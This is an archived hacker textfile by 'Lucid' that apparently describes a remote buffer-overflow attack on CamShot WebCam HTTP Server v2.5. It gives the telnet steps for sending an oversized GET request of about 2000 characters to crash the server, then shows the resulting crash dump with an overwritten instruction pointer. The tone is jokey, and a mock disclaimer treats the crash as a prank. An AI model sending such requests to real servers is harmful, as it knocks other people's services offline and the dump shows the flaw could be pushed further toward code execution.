💾 Archived View for gemini.spam.works › mirrors › textfiles › uploads › cam-hack.txt captured on 2023-01-29 at 12:48:48.

View Raw

More Information

⬅️ Previous capture (2020-10-31)

-=-=-=-=-=-=-

#Kill a Cam Version 1x
#Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP
----------------------------------------------------------------

#Intro
_ So im sure you might have seen this little trick.. but if you havent, its a rather funny
way to screw with a server running CamShot WebCam HTTP Server v2.5.  As always, this is
for you information only, hacking is bad, it make mes cry... im starting to cry thinking
about it now.. see what you've done??!

#Affects
_ As far as I know, for sure it affects Win9x, I am yet to find an NT, ME, or 2000 box
running it.

#The Code
[lucid@localhost]$ telnet www.test.com 80
Trying test.com...
Connected to www.test.com
Escape character is '^]'.
GET (buffer) HTTP/1.1
(enter)
(enter)

#Why
_ (buffer) is about 2000 charicters, requesting this cuases the server to over flow
itself, and in time, crashing the software, ( once or twice on my test machine it killed
the system as well ).

#What They See
CAMSHOT caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=3D0069fa74 CS=3D017f EIP=3D61616161 EFLGS=3D00010246
EBX=3D0069fa74 SS=3D0187 ESP=3D005a0038 EBP=3D005a0058
ECX=3D005a00dc DS=3D0187 ESI=3D816238f4 FS=3D33ff
EDX=3Dbff76855 ES=3D0187 EDI=3D005a0104 GS=3D0000
Bytes at CS:EIP:

Stack dump:
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74
005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8


#Closing
_ Yes its a lame little exploit bu its fnny none the less.  Again only use this on yourself
would wanna make me cry again.

Lucid
Phreak2000.com